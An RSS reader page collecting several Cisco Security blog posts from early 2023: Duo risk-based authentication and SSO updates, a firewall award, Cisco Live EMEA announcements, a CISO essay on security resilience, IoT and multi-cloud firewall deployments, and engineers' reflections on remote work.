FreshRSS

🔒
❌ About FreshRSS
There are new available articles, click to refresh the page.
Before yesterdaySecurity – Cisco Blog

Smart and Frictionless Zero Trust Access for the Workforce

By Ganesh Umapathy

Providing secure access and a frictionless user experience are typically competing initiatives, but they don’t have to be! Read on to learn why.

In our world today, context changes quickly. We work from home, coffee shops and the office. We use multiple devices to do work. And on the flip side, attackers are becoming increasingly savvy, getting around security controls, such as multi-factor authentication (MFA), to gain unauthorized access.

To quote Wendy Nather, Cisco’s head of Advisory CISOs, “Trust is neither binary nor permanent.” Therefore, security controls must constantly evaluate for change in trust, but without adding unnecessary friction for end-users.

It’s no surprise that the recently published Cybersecurity Readiness Index, a survey of 6,700 cybersecurity leaders from across the globe, revealed that more progress is needed to protect identity, networks and applications.

To address these challenges and to make zero trust access for the workforce easy and frictionless, Cisco Duo announced the general availability of Risk-Based Authentication and enhancements to our enterprise ready Single Sign-On solution at Cisco Live EMEA 2023 earlier this week.

Risk-Based Authentication

Chart showing how Risk-Based Authentication starts by evaluating the risk signal analysis based off of device trust, location, wi-fi fingerprint, and known attack patterns. Based of off this, it decides what kind of authentication is required - including no authentication, Duo push 2FA, verified Duo push, FIDO2 authenticator - before allowing (or blocking) access to corporate resources.

Risk-Based Authentication fulfills the zero trust philosophy of continuous trust verification by assessing the risk level for each access attempt in a manner that is frictionless to users. A higher level of authentication is required only when there is an increase in assessed risk. Duo dynamically detects risk and automatically steps up authentication with two key policies:

1. Risk-Based Factor Selection

The Risk-Based Factor Selection policy detects and analyzes authentication requests and adaptively enforces the most secure factors. It highlights risk and adapts its understanding of normal user behavior. It does this by looking for known attack patterns and anomalies and then allowing only the more secure authentication methods to gain access.

For example, Duo can detect if an organization or employee is being targeted for a push bombing attack or if the authentication device and access device are in two different countries, and Duo responds by automatically elevating the authentication request to a more secure factor such as phishing resistant FIDO2 security keys or Verified Duo Push.

Chart showing how Risk-Based Authentication, when picking up on known attack patterns, will either request a Verified Duo Push or Block access.

2. Risk-Based Remembered Devices

The Risk-Based Remembered Devices policy establishes a trusted device session (like “remember this computer” check box), automatically without asking the user the check a box, during a successful authentication. Once the session is established, Duo looks for anomalous IP addresses or changes to a device throughout the lifetime of the trusted session and requires re-authentication only if it observes a change from historical baselines.

The policy also incorporates a Wi-Fi Fingerprint provided by Duo Device Health app to ensure that IP address changes reflect actual changes in location and not normal usage scenarios such as a user establishing an organizational VPN (Virtual Private Network) session.

Chart showing how Risk-Based Authentication, when using location and wi-fi fingerprint to determine that risk levels are low, won't require authentication.

Duo uses anonymized Wi-Fi Fingerprint to reliably detect whether the access device is in the same location as it was for previous authentications by comparing the Wi-Fi networks that are “visible” to the access device. Further, Duo preserves user privacy and does not track user location or collect any private information. Wi-Fi Fingerprint only lets Duo know if a user has changed location.

Single Sign-On

A typical organization uses over 250 applications. Single sign-on (SSO) solutions help employees access multiple applications with a single set of credentials and allow administrators to enforce granular policies for application access from a single console. Integrated with MFA or passwordless authentication, SSO serves as a critical access management tool for organizations that want to implement zero trust access to corporate applications.

Chart showing how Duo SSO integrates with SAML 2.0 and OIDC applications

Duo SSO is already popular among Duo’s customers. Now, we are adding two new capabilities that cater to modern enterprises:

1. Support for OpenID Connect (OIDC)

An increasing number of applications use OIDC for authentication. It is a modern authentication protocol that lets application and website developers authenticate users without storing and managing other people’s passwords, which is both difficult and risky. To date, Duo SSO has supported SAML web applications. Supporting OIDC allows us to protect more of the applications that our customers are adopting as we all move towards a mobile-first world and integrate stronger and modern authentication methods.

2. On-Demand Password Resets

Password resets are expensive for organizations. It is estimated that 20-50% of IT helpdesk tickets are for password resets. And according to a report by Ponemon Institute, large enterprises experience an average loss of $5.2 million a year in user productivity due to password resets.

When logging into browser-based applications, Duo SSO already allows users to reset passwords when they have expired in the same login workflow. And we heard from our customers that users want the option to proactively reset passwords. Now, Duo SSO offers the convenience to reset their Active Directly passwords before they expire. This capability further increases user productivity and reduces IT helpdesk tickets.

Screenshot of Duo's self-service password reset prompt

Risk-Based Authentication and enhancements to Duo SSO are available now to all paying customers based on their Duo Edition. If you are not yet a Duo customer, sign up for a free 30-day trial and try out these new capabilities today!


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

SE Labs 2023 Annual Security Report Names Cisco as Best Next Generation Firewall

By Neville Letzerich

Cisco is honored to be this year’s winner of the Best Next Generation Firewall Award in the SE Labs 2023 Annual Report. This industry recognition validates Cisco’s continuous push towards harmonizing network, workload, and application security across hybrid and multicloud environments. I’m incredibly proud of the Cisco Secure Firewall team and am thankful for our amazing customers who continue to trust Cisco and develop their network security around our capabilities. 

SE Labs, a cybersecurity testing and evaluation firm, provides impartial and independent assessments of various cybersecurity products and solutions. In their 2023 Annual Report, SE Labs states: 

“Our Annual Security Awards recognizes security vendors that notonly do well in our tests, but perform well in the real world withreal customers. These awards are the only in the industry thatrecognize strong lab work combined with practical success.”

SE Labs Testing Methodology 

SE Labs performs tests on behalf of customers seeking independent proof-of-value assistance, as well as security vendors. At Cisco, we use third-party evaluations from multiple sources, including SE Labs, to augment our internal testing and to drive product improvement. 

Winners were determined after months of in-depth testing, based on a combination of continual public testing, private assessments and feedback from corporate clients who use SE Labs to help choose security products and services. The award further validates that our customers can expect superior threat protection and performance with Cisco Secure Firewall. 

SE Labs’ reports use the MITRE ATT&CK framework, employing both common “commodity” malware samples and sophisticated, targeted attacks. Their network security testing uses full attack chains to assess the detection and protection abilities of network devices and combinations of network and endpoint solutions. SE Labs publishes its testing methodologies and is BS EN ISO 9001: 2015 certified for The Provision of IT Security Product Testing. 

As a worldwide leader in networking and security, Cisco is better positioned than any other security vendor to incorporate effective firewall controls into our customers’ infrastructure — anywhere data and applications reside. We offer a comprehensive threat defense with industry-leading Snort 3 IPS to protect users, applications, and data from continuously evolving threats. Our solutions also leverage machine learning and advanced threat intelligence from Cisco Talos, one of the world’s largest commercial threat intelligence teams. 

Cisco Secure Firewall Key Features 

  • Cisco Secure Firewall’s threat-focused architecture enables superior visibility and control of network traffic. Many security practitioners today struggle with a lack of visibility into encrypted traffic, which is why Cisco has developed the differentiated Encrypted Visibility Engine that detects threats in encrypted traffic – with minimal to no decryption. Secure Firewall’s detailed analysis, visibility, and reporting enable organizations to rapidly gain insights into their network traffic, applications, and assets. 
  • Cisco Secure Firewall capabilities provide a unified security posture across the entire network. This is achieved through its tight integration with workload, web, email, and cloud security through our SecureX XDR platform. This integration increases the efficiency of the SecOps team, by accelerating threat investigation and response time. 
  • Designed to be adaptive and highly scalable in dynamic environments, Cisco Secure Firewall is expressly designed to reduce total cost of ownership. It helps teams save time with consistent policy enforcement, helping our customers realize up to a 195% return on investment over three years, as noted in the third-party research we commissioned with Forrester Consulting.   

In the constantly evolving world of cybersecurity, it is important to have access to the latest and most advanced technologies to stay ahead of threats. Whether you are an enterprise, government, healthcare, or a service provider organization, Cisco Secure Firewall provides top-ranked security. 

When you invest in Cisco Secure Firewall, you are investing in award-winning threat defense with capabilities that are built for the real world. Learn more about SE Labs 2023 Annual Report, Cisco Secure Firewall and how you can refresh your firewall. 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Honoring our ‘Cybersecurity Defender of the Year’ in EMEA

By Neville Letzerich

Congratulations to security advocate Luigi Vassallo, Chief Operating Officer and Chief Technology Officer of Sara Assicurazioni Insurance, an innovative Italian cloud-first insurance firm.

In the last two years, cybersecurity has advanced and can feel like a one-two punch to those who are not prepared. But what does that preparation look like? For Luigi Vassallo, it was more than just tackling cybersecurity defense on his own. Luigi reached out to the Cisco community, offering his knowledge and expertise to help others. This is what stood out to make him our Cybersecurity Defender of the Year in EMEA for the Cisco Global Advocate Awards 2023 EMEA event.

Cisco’s advocacy community, Cisco Insider Advocates, brings our customers together and provides a way for them to make powerful connections, expand their professional and personal networks, and learn from top experts in their field. Luigi personifies the spirit of Insider Advocates by sharing freely within the community.

One may wonder where Luigi finds the time or energy to participate in the community. Luigi finds immeasurable energy by training as a kickboxer and as an avid cyclist. This energy transforms into a philosophy of helping others. As Luigi says, it is about being “the best version of yourself.”

Luigi sums up his approach to cybersecurity this way: “Cybersecurity for me is like boxing: you never know when your opponent will attack, but you have to know in advance how to respond and what you can do.”

Luigi has been featured in a profile piece, as well as a video, where he speaks about his personal goals, as well as his goals for making Sara Assicurazioni as secure as possible with Cisco’s products. Part of his passion comes from being comfortable with the uncertainty of cybersecurity, coupled with the confidence that Cisco is there to help his organization. I’m honored that Sara Assicurazioni has joined forces with Cisco Secure to confidently define zero-trust and XDR strategies that increase security resilience and drive better customer outcomes for them.

When notified of the award, Luigi’s humility and dedication to the community was evident, as he shared, “I feel happy and surprised about this award, as I didn’t expect to win because there were so many good advocates who were nominated with me. I want to thank Cisco for awarding me the Cybersecurity Defender of the Year honor.”

Luigi also credits the Cisco Insider Advocacy program for its ability to connect and grow the cybersecurity community, adding:

“This is also what makes Cisco different from other security vendors; the capacity to recognize the innovation and resilience of its customers. I feel that we are part of the same movement, and we are together in the same fight against cybercriminals. To all other nominees, I want to say thank you for your hard work in cybersecurity and in sharing your good practices with me in the Cisco Insider Advocacy community and now at Cisco Live EMEA.”

We congratulate Luigi, not only for keeping his guard up, but for helping others to do the same by being part of the Cisco Insider Advocacy community.

The Cisco Global Advocate Awards celebrates Cisco’s passionate and innovative customer advocates who go above and beyond in demonstrating thought leadership and supporting Cisco through success stories, speaking engagements, product reviews, and so much more.

We’re planning three exclusive events that will coincide with Cisco Live conferences in Amsterdam, Las Vegas, and Melbourne in 2023. We hope you’ll join us as we recognize our customer advocates by region for actively supporting Cisco. You won’t want to miss it.

To learn more, and to become a member, please visit us here.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

All in for Security: Cisco Secure at Cisco Live EMEA 2023

By Tom Gillis

Cisco Live is the premier destination for Cisco customers and partners to gain knowledge and build community. Our teams work hard to deliver education and inspiration, ignite creativity, deliver practical know-how, and accelerate the connections that fuel your digital future.

The Cisco Secure team is excited to share our expertise to help power the strategies – and safety – of your organization.

If it’s connected, it’s protected

Executive Q&A Panel at Cisco Live EMEA

In 2023, the threat landscape will evolve to one that sees attacks on every surface, from criminals who are opportunistic, yet laser-focused on their goal. The attacks themselves could be email-borne, directly targeted, socially based, or a mix of all three.

Criminals will target vulnerabilities, operational deficiencies, suppliers, and business partners, as a means of accomplishing their goals. They will use the target’s own environment and take advantage of existing people and technology problems, including alert fatigue and staffing shortages.

To face this reality and address the needs of organizations both large and small, Cisco will continue to focus on education and innovation in the areas of preventing insider threats, providing consistent and informed alerts, enabling actionable intelligence, and delivering solutions to implement a zero-trust security framework.

As the organization that pioneered networking, we are driven to secure every connection, providing end-to-end protection for users and devices across multiple clouds and networks with a seamless experience.

Innovating to enable a more resilient organization

As our vision for the integrated Cisco Security Cloud evolves, we’re continuing to challenge existing models and unify security and networking, with foundational elements that execute on this vision. From verified push – which protects organizations from MFA-focused phishing attacks – to Wi-Fi Fingerprint, and Remembered Devices, the performance enhancements with Enterprise Single Sign-on and Cisco+ Secure Connect, we continue to meet our customers where they are, offering true zero trust, with frictionless experiences for the hybrid workforce.

We’re excited to celebrate the following innovations and updates announced at Cisco Live EMEA:

Risk-Based Authentication

Finding the balance between usability and security is now easier than ever. With Risk-Based Authentication, users have the access they need, secured by real-time contextual signals. Organizations can increase security efficacy by dynamically adjusting authentication ​requirements based on risk levels and by enabling safer end-user behavior. Risk-based authentication now includes wi-fi fingerprint, remembered device, and verified push features, which work together to reduce risk while preserving user experience ​by only requesting additional interaction for suspicious logins or a change in risk.

Single Sign-On

Our Enterprise Ready Single Sign-on expands Duo SSO with three new capabilities to easily connect single sign-on to modern apps and empower end users. By adding major protocol support, improved admin tooling, and SSO on demand password resets, organizations enable easier and more secure access from anywhere.

Cisco+ Secure Connect

Cisco SD-WAN customers can now enjoy all the benefits of a turnkey, single-vendor SASE solution that brings together industry-leading networking with security:​ Cisco+ Secure Connect. This new integration gives Cisco SD-WAN (powered by Viptela) customers fast, secure private application and internet access, enabling them to deliver a secure experience, anywhere work happens.

Application Security

We are also announcing the introduction of industry-first Business Risk Observability, an enhancement of our Full-Stack Observability application security solution. Available through Cisco Secure Application, which is integrated into Cisco AppDynamics, it provides a business risk scoring solution which brings together Kenna Risk Meter score distribution and Business Transactions from Cisco AppDynamics and integrates with Panoptica for API security and Talos for threat intelligence.

Cybersecurity Readiness Index report

The initial findings from our first Cybersecurity Readiness Index reveal that while technology to devices is widely adopted, more progress is needed to protect identity, networks and applications. The report assessed the preparedness of companies around the world to safeguard against cyber threats in the current environment. See our key findings and security readiness trends, with the full report launching in the coming weeks.

As we navigate 2023, we will continue to face uncertainties and challenges. We are fully committed to our customers and partners in the journey to provide security resilience, supporting a frictionless user experience, and solutions threat intelligence that work to continually minimize risk.

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

The Power of Relationships: Executive Buy-In and Security Culture for Bolstering Resilience

By J. Wolfgang Goerlich

“Where do we start?”

This is the question every CISO asks about every new program. In fact, I ask and answer that question many times a month. There’s a reason for this, of course. A strong start to any project builds momentum, reassures stakeholders, and sets the stage for what’s to come. Security resilience initiatives are no different. Security resilience is the ability to anticipate and respond to unpredictable threats or changes, and then emerge stronger. It’s hard to imagine a more vital undertaking for CISOs. And as with all initiatives, CISOs always want to know where to begin.

They’re likely to find some valuable starting points in the Security Outcomes Report, Volume 3: Achieving Security Resilience, the latest in a series of reports released by Cisco and reflecting the viewpoints of 4,700 IT and security professionals from 26 countries. The report identifies seven success factors CISOs can pursue to improve outcomes within their own enterprise security resilience programs, placing a high priority on security resilience. The seven success factors range in nature from the architectural—simplifying your hybrid IT environment, maximizing zero trust adoption—to more relationship-focused factors.

It’s the latter that caught my eye.

Seven success factors for resilience:

  1. Establish executive support
  2. Cultivate a culture of security
  3. Hold resources in reserve
  4. Simplify hybrid cloud environments
  5. Maximize zero trust adoption
  6. Extend detection and response capabilities
  7. Take security to the edge

Solid relationships enable security resilience

It shouldn’t surprise any CISO that the first two success factors are built around relationships. These factors zero in on relationships with company leadership (as measured by establishing executive support) and relationships with people across the organization (as measured by cultivating a culture of security). Experienced CISOs know that these factors can make or break security initiatives.

Given the objective of security resilience is to withstand threats and come back even stronger, it’s clear that resilience must exist before, during, and after a cybersecurity incident. This has repercussions on the executive level and throughout the business. Lack of executive support can lead to detection, response, and recovery capabilities that are chronically underfunded. This leaves CISOs at a disadvantage when security incidents do inevitably happen and panic strikes the C-suite. What’s more, CISOs who lack strong executive relationships may also find themselves struggling to oversee incident management and coordinate communications. And afterward? Remediating and improving the security posture, which often impacts multiple parts of the organization beyond IT and often requires significant investment, stalls without a necessary lift from leadership.

The security report, which scores resilience levels across a series of criteria, finds that organizations reporting a strong backing from leadership have resilience scores that are 39% higher when compared to organizations reporting weak support. “Bridges to the C-suite are built upon a solid understanding of how the business works and how security initiatives can make it work even better,” notes the report. “Support goes both ways in any relationship, after all.”

In addition to keeping the program aligned, CISOs must keep in communication with their peers and superiors. Those who share only transactional relationships within the C-Suite find their interactions limited to status updates and budget requests. Transformational relationships, however, involve more frequent and deeper communication and interactions, which cover a broader set of topics than submitting the latest budget ask. They are, in other words, more valuable.

A security culture can create willing resilience partners

Of course, executive support is just one crucial factor for success. Resilience programs need broad support from throughout the organization, not just at the top. Every time an employee picks up a mouse or accesses an app from their mobile phone, they make a choice to either strengthen or lessen the organization’s security posture. Every time an improvement is necessary following a security event, cultural buy-in determines whether this new request from security is implemented or circumvented.

According to the report, organizations that successfully foster a culture of security can see a 46% increase in resilience compared to those who lack such a culture. Much like aligning a program with the business direction furthers leadership buy-in, CISOs need to align security policy with the functional direction of the business—but in a way that helps employees see security measures as protecting not just corporate data and IT assets but also their own future. When employees aren’t on board or see security measures as IT concerns with no relation to them, resilience suffers. “Frequent security policy violations and workarounds,” notes the report, “are evidence of poor security culture.” By viewing policy exceptions as feedback, and investigating these from the perspective of identifying and correcting misalignment, security leaders can enroll employees as the willing participants in the solution—rather than contributors to the problem.

Security leaders know, by and large, what we need to do to secure our organizations. We have frameworks with pages of controls. We have risk registers with lists of action items. Where we often struggle is translating this knowledge into action. To do that, we must see our efforts within the strategic context of executive leaders and the tactical reality of the line managers in our organization. We must personalize and prioritize our efforts around what matters to the people we collaborate with. It is through engaging people that our security programs become human-centric and, in turn, become more resilient.

Where do we start? With relationships. Good relationships lead to good security programs, and good security programs lead to great relationships. And all of these contribute to security resilience.

Download the Security Outcomes Report, Vol. 3: Achieving Security Resilience today.

Explore more original research and blogs like this:


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Cisco secures IoT, keeping security closer to networking

By Vibhuti Garg

The use of unmanaged and IoT devices in enterprises is growing exponentially, and will account for 55.7 billion connected devices by the end of 2025. A critical concern is deploying IoT devices without requisite security controls. 

While these numbers are numbing, their reality is undeniable. 90% of customers believe digitization has accelerated the importance placed upon security. The World Economic Forum now lists cybersecurity failure as a critical threat, and estimates a gap of more than 3 million security experts worldwide, hindering secure deployments at scale. Furthermore, 83% of IoT-based transactions happen over plaintext channels and not SSL, making them especially risky. 

Cisco’s solution  

Securing an IoT device can be achieved either through securing the IoT device itself, or hardening the network it accesses. Securing devices can be cumbersome, requiring complex manufacturing partnerships and increasing unit prices, thereby reducing adoption. On the other hand, securing the network is always desirable as it helps secure access, encrypt traffic, and ease management.  

Being a leader in both security and networking, Cisco continues to bring security closer to networking, providing the network with built-in security, and enabling the network to act both as sensor and as an enforcer. The convergence of security and networking leverages the network’s intelligence and visibility to enable more-informed decisions on policy and threats. 

Cisco uniquely integrates security and networking, for instance we recently integrated Cisco Secure Firewall to operate on Cisco Catalyst 9000 Series switches. Additionally, Secure Firewall can be deployed in a containerized form, on-premises and in clouds. Cisco Secure Firewall classifies traffic and protects applications while stopping exploitation of vulnerable systems. Additionally, we offer Identity Services Engine with AI Endpoint Analytics to passively identify IoT devices and apply segmentation policies. Furthermore, Cisco offers management flexibility by integrating with Cisco Defense Orchestrator and DNA Center and with existing customer tools like SIEMs and XDRs. 

Let’s look at three use cases where the addition of Secure Firewall capability on Catalyst 9000 Series switches solves real world problems: 

Use case 1: Securing the Smart Building: This solution is ideal to secure smart buildings, converging various IoT systems into a single IT-managed network infrastructure. Smart buildings lower the operational and energy costs. Smarter building systems, however, pose serious security risks as these include so many unmanaged devices such as window shades, lighting, tailored HVAC, and more. One of the methods to secure smart buildings is to control access to avoid manipulation of sensors. Such control is attained with a networking switch with enhanced firewall capability. The firewall ensures granular segmentation, directing policies for traffic generated out of IoT devices, providing access to the right users. This integration also brings security closer to endpoints, making policy orchestration simpler. 

Use Case 2: Centrally manage isolated IoT network clusters: IoT devices which communicate with each other in the same subnet typically cannot be routed, which is a challenge. By default, most IoT networks are configured in the same subnet, making it difficult to manage them centrally. Administrators are forced to physically connect to the IoT network to manage and collect telemetry. Furthermore, IoT vendors often charge hefty amounts to update IP addresses of devices. Cisco Secure Firewall, hosted on the Catalyst switch, solves this problem and not only inspects traffic from the IoT network but also translates duplicate IoT IP addresses to unique global IP addresses using NAT for centralized management of isolated IoT networks.  

Use Case 3: Securely encrypt IoT traffic passing through a shared IT network: At airports, for example, multiple vendors manage unique systems such as baggage, air quality, biometric access control, etc, which share a common network. IoT traffic is usually in plain text, making it susceptible to packet sniffing, eavesdropping, man-in-the-middle attacks, and other such exploits. The IPSec capability on Cisco Secure Firewall encrypts IoT traffic, securing data transfer and reducing risk.  

Cisco’s IoT initiatives join the once disconnected worlds of IT and IoT, unifying networking and security. For further details refer to the At-A Glance and see how and an Australian oil company, Ampol, fortified its retail IoT with Cisco Secure! 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Building a secure and scalable multi-cloud environment with Cisco Secure Firewall Threat Defense on Alkira Cloud

By Anubhav Swami

In today’s security climate, NetOps and SecOps teams are witnessing increased attack surface area as applications and workloads move far beyond the boundaries of their data center. These applications/workloads move to, and reside in multi-cloud architecture, adding complexity to connectivity, visibility, and control. In the multi-cloud world, the SecOps teams use a distributed security model that is expensive, difficult to deploy, and complex to manage.

Cisco has partnered with Alkira to help secure your multi-cloud environment. Combining Alkira’s simplified cloud connection through their cloud network-as-a-service platform (SaaS-like model) with Cisco’s industry-leading security controls, we can deliver a centralized security model for multi-cloud architecture that is easy to deploy, manage, and increases visibility and control.

Cisco Secure Firewall Threat Defense Virtual provides unmatched security controls such as stateful firewalling, Snort3 IPS, URL filtering, malware defense, application visibility and control, and more. Additionally, with the purchase of Secure Firewall Threat Defense Virtual, you will receive license entitlement to Cisco SecureX, our open XDR and orchestration platform, helping you accelerate threat detection, investigation, and remediation.

Cisco Secure Firewall Management Center (FMC) is required for managing Secure Firewall Threat Defense Virtual, helping administrators enforce consistent access policies, rapidly troubleshoot security events, and view summarized reports across the deployment.

Secure Firewall Threat Defense Virtual is available on Alkira’s service marketplace through Bring-Your-Own-License (BYOL) and Pay-As-You-Go licensing options. Customers can seamlessly deploy and insert Secure Firewall in their Alkira Cloud Exchange Points (CXP).

Benefits of this integrated architecture include:

  • Simplified network and security architecture: Leverage fully automated insertion and service-chaining of Secure Firewall in a centralized security model for a streamlined network and security architecture.
  • Deeper visibility and control in multi-cloud environments: Enjoy simplified firewall insertion in a centralized security model to achieve both north-south and east-west traffic inspection capability for multi-cloud environments.
  • Unified security policy: Uniformly enforce firewall security policy across on-premises, cloud, and multi-cloud environments.
  • Greater visibility: Cloud-agnostic security controls offer deeper visibility and control across all platforms
  • Auto-scale: Cisco Secure Firewall provides a flexible architecture that can automatically scale with the network load to meet demand. The auto-scaled firewall instance receives the configuration and licenses automatically (Cisco Secure Firewall Threat Defense auto-scale coming in Q2CY23).

The Cisco Secure Firewall Threat Defense brings the following capabilities to the environment:

  • Stateful Firewall Inspection
  • Application Visibility & Control
  • Next-Generation Intrusion Prevention System (IPS)
  • URL Filtering
  • Malware Defense
  • Encrypted Traffic Visibility

Figure 1: Multi-cloud security architecture in Alkira Cloud Exchange Point with Cisco Secure Firewall

Figure 1 shows a multi-cloud environment inter-connected using Alkira Cloud Exhange Platform (CXP). In the above architecture, Cisco provides seamless insertion of security controls and enables the following use cases for firewall insertion:

  • Multicloud Security: Cisco Secure Firewall Threat Defense provides a centralized security model that enables better security controls, visibility, and network segmentation. This deployment offers north-south (N/S) and east-west (E/W) traffic inspection models.
  • Branch Security: Alkira Cloud Exchange Platform (CXP) connects branches and Cisco Secure Firewall Threat Defense protects N/S and E/W branch traffic.
  • Secure Internet Edge: Deployment of Cisco Secure Firewall inside CXP enables secure Internet edge for inbound and outbound Internet traffic.
  • Cloud DMZ: Enforce ingress firewall security policy for application traffic between remote users and Internet-facing applications deployed in the on-premises data centers or cloud environments.
  • Shared Application Services: Enforce firewall security policy for cross-segment application traffic in cases of business partner integration, mergers, acquisitions, and divestitures.

Firewall Insertion made easy

Using Alkira’s customer portal, Cisco Secure Firewall Threat Defense Virtual can be easily inserted in the traffic path within minutes. Figure 2 shows how automation & orchestration eliminates additional configuration required in the legacy insertion model.

Figure 2: Cisco Secure Firewall Threat Defense Virtual insertion

Management Options

Cisco Secure Firewall Threat Defense Virtual is managed using Cisco Secure Firewall Management Center (FMC). Customers can use on-premises FMC or build a virtual FMC instance in the cloud. Cisco and Alkira support both models of deployment.

Insertion models

Cisco Secure Firewall Threat Defense Virtual protects the following traffic flows in Alkira CXP:

  • Cloud to cloud (intra & Inter-cloud)
  • Cloud to on-premises
  • Cloud to Internet
  • On-premises to cloud
  • On-premises to Internet
  • Internet to on-premises
  • Branch to branch
  • Branch to Internet
  • Internet to branch

Alkira and Cisco’s partnership simplifies the deployment of enterprise-grade security in the cloud while enabling multi-cloud visibility and end-to-end threat defense for customers.

Additional Resources:

Cisco Secure Firewall Threat Defense

Cisco Secure Firewall Data Sheet

Cisco Secure Firewall Management Center

Alkira

Alkira Service Marketplace

Alkira blog on Cisco Secure Firewall Threat Defense


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

10 Surprises of Remote Work from Security Engineers

By Mary Kate Schmermund

For Cisco engineers working on Duo, having a remote-first workplace has helped them reach life goals, connect with colleagues around the world, and be intentional communicators. We understand that working remotely can be an adjustment — that’s why we’ve compiled the 10 parts of remote work that surprised our team members most and their advice for navigating the nuances. If you’re interested in being part of a remote-first workplace, check out our open positions.

1. More perspectives make a positive impact on the product

Senior Engineering Leader David Rines has worked remotely for the past seven years. He’s found that Cisco’s approach to distributed teams has “enabled us to pick up the right talent, and not necessarily local talent. We are moving towards a global, follow the sun environment,” he said.

One of the aspects Rines appreciates most of this structure is getting “a widely varied set of perspectives and experiences that help build a more reliable, more robust product, which is why we’re here.”

Another benefit to having colleagues across the globe is the sharing of recipes, a perk Senior Site Reliability Engineer Bernard Ting particularly enjoys. Proactively communicating with colleagues virtually “helps you to form bonds with people from other teams. You can always learn something new about cultures elsewhere. I talk to people about food and so I’m always gathering recipes from people from all over the world,” Ting shared.

2. Gathering virtually inspires collaborative problem-solving

While some may fear that working remotely could lead to feelings of isolation and loneliness, a different camaraderie can flourish in the structure of our distributed teams. With colleagues across time zones, “there’s always someone there who you can reach out to help solve your problem,” Rines said.

Collaboration hours are another way Site Reliability Engineering Manager Jaya Sistla has cultivated virtual community and problem-solving. These hours are blocked off for team members to talk about what they’re working on. “The main thing is being able to ask for help so you don’t go into the rabbit hole debugging things,” Sistla said.

Ting points out that working in a distributed model allows you to really engage in virtual events and conversations. Given that the team mainly communicates through online chat, Ting has found that “forces you to see everyone as equally approachable, which has made me more comfortable reaching out to people from anywhere in the world.”

3. Intentional online socializing strengthens teams working remotely

For folks sharing an office, collaboration can happen through casual chats over coffee. When facing a challenge, you can ask your neighbor for support. While ideally virtual communication could have a similar cadence and spontaneity, the logistics of remote and distributed work require intentionality and being proactive in connecting with colleagues as people and as co-workers.

When Ting first started working remotely, he felt that every meeting needed to be formal and have a business objective. By sharing his feelings with his manager, he was reassured that “socializing is a very important part of teamwork, because if you don’t have a good relationship with your colleagues you’re not going to be able to have healthy discussions, healthy conflict or be able to critique each other when the situation arises.”

Since that conversation, Ting has been more proactive about catching up with colleagues, which can include sharing a coffee over video chat. Duo’s “coffee roulette” formalizes the process as every month, employees who opt in can be randomly paired up for a quick half-hour chat focused exclusively on socializing. Ting has found being proactive about socializing virtually helpful. “It’s made me more intentional with my time and really treasure the social experience you can get,” he said.

4. Remote management + training can be effective

Some folks may be concerned that without a manager observing their efforts and work ethic day in and day out, it may be harder to recognize accomplishments and challenges. Ting found that within his team “when you work on projects and in your one-on-ones with your managers, they’re always very intentional about learning what you’ve been doing and seeing what your progress is like on certain projects. I’ve been asked, ‘How do you think you can improve? What are some of the things you’ve been doing outside of the team work?’”

To cultivate cross-team collaboration and education, there are thoughtfully planned virtual lunch and learns. “We schedule training sessions and common meetings at times that are flexible for everyone. If it has to be repeated, we do it so people can comfortably attend rather than stretching themselves and attending at odd hours,” Sistla said.

5. Informal communication = hugely important [bonus points for individualized emojis]

For Software Engineer Nick Aspinall, an important and fun part of working remotely is keeping in touch with virtual messaging. One unique perk has been getting to create and customize emojis with team members including a few of himself in “various ridiculous states,” he said.

Connecting with colleagues on themed channels focused on personal and professional interests from coffee to pets “makes it really cool because you can meet people across different teams and still get some of the feeling of rubbing elbows that you get when you’re in the office,” Aspinall said. Participating in these virtual conversations boosts morale while also providing an endless supply of cute animal pics.

6. Conveying different information requires different formats

Given the multi-faceted nature of our work and the importance of consistent information sharing, having different communication channels and formats to communicate data with varying degrees of complexity is vital. Having information readily accessible, accurate and updated is particularly necessary in a field like cybersecurity.

Senior Software Engineer Mario Lopez finds that the variety of information sources contributes to an easeful remote working experience. For instance, for complex architecture decisions or detailing, Duo’s Wiki is the best source.

Software Engineer Hanna Fernandez has benefited from chat channels dedicated to design and engineering topics to “see what everyone’s up to and what thoughts people have,” she said. Sista pointed out these are great places to ask questions and open up dialogue to solve problems.

7. Video-on culture increases empathy and smiles

Our culture is “video-on,” meaning that it is preferred that during video meetings, as much as possible, attendees have their cameras on. Lopez loves this because “you get a bit of that personal human element.”

“We’re all people behind these screens. You definitely get some of people’s personality through text, but you get it more when you actually see them. It’s infectious when you see someone smiling. You’ve got to smile back,” he shared (while we both smiled).

8. Small talk matters

When Fernandez started at Cisco, she was advised to schedule individual meetings with everyone she would be working with on every team that she joined. That suggestion is one she’s applied even virtually.

“It’s a great strategy because I already know that my team is super talented and very smart, but this way I also get to know them as humans beyond their roles,” Fernandez said. Fernandez also finds it important to check in with co-workers and ask how they’re feeling and how their time off was. “I know a lot of people hate small talk, but it’s not just small talk. I’m genuinely interested in how my co-workers are doing.”

9. Life goals can more easily become reality

One of Ting’s biggest goals was buying his first house in the countryside outside of London. By working remotely, Ting has flexibility in his location which allowed him to achieve his goal of buying a house and settling down with his partner, while giving their dogs the space they need to be dogs.

remote

10. Take time to transition as an engineer working remotely

When transitioning from fully remote to hybrid, it’s important to recognize that there will be some shifts to get accustomed to. As the structures of remote, distributed and hybrid work evolve, it’s important to stay flexible and notice what’s possible through multiple modalities of team building. Many teams have enjoyed in-person gatherings and connecting through virtual lunches and team games when remote.

